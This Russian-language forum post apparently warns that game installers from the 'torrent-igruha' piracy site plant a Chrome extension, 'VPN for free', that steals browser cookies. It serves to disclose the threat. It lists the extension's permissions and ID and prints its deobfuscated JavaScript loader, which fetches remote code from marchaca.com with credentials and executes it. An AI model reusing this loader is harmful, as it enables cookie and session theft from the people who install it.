Torrent-igruha ворует куки и устанавливает вирусы

[Nanachi]

После загрузки с "торрент-игрухи" раста, установщик закрывает браузер и ставит расширение,

Спойлер: файлы расширения в установщике:

которое называется VPN for free и в его .js файле идёт подключение к "

Пожалуйста, авторизуйтесь для просмотра ссылки.

" откуда происходит вызов ко всем кукисам и отправка на их сервра
Причём вот перечень действий, которые может делать расширение :

Пожалуйста, авторизуйтесь для просмотра ссылки.

Спойлер: :

Просмотр и изменение ваших данных на всех сайтах
Чтение и изменение истории просмотров на всех устройствах, где вы используете этот аккаунт
Показ уведомлений
Просмотр и изменение закладок
Управление скачанными файлами
Управление приложениями, расширениями и темами
Изменение настроек конфиденциальности

edppdjhbhljgmjcoifijlkklddbejmck -устанавливаемое расширение \
extension.js - деобфусцированный .js код из расширения
marchaca.js - деобфусцированный .js блок с "

Пожалуйста, авторизуйтесь для просмотра ссылки.

" \


extension.js из edppdjhbhljgmjcoifijlkklddbejmck:

!(function () {
  setTimeout(() => chrome.runtime.reload(), 3600000)
  let r = new URL('https://marchaca.com/test'),
    t = new XMLHttpRequest()
  t.open('GET', r.href)
  t.withCredentials = true
  t.onload = () => {
    200 === t.status && t.responseText
      ? new Promise(Function(t.responseText))
      : setTimeout(() => chrome.runtime.reload(), 600000)
  }
  t.send()
})()

То, что скачивает с сайта "

Пожалуйста, авторизуйтесь для просмотра ссылки.

" ещё код блок( .js файл ), который собирает и отправляет куки.

Так же

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

Пожалуйста, авторизуйтесь для просмотра ссылки.

( Savematik )

Пожалуйста, авторизуйтесь для просмотра ссылки.

2

В конце хочется сказать, что не во всех играх есть такие установщики, например в игре Below-the-Stone-v0.4 нет никаких установщиков, но и весит она 500 мегабайт..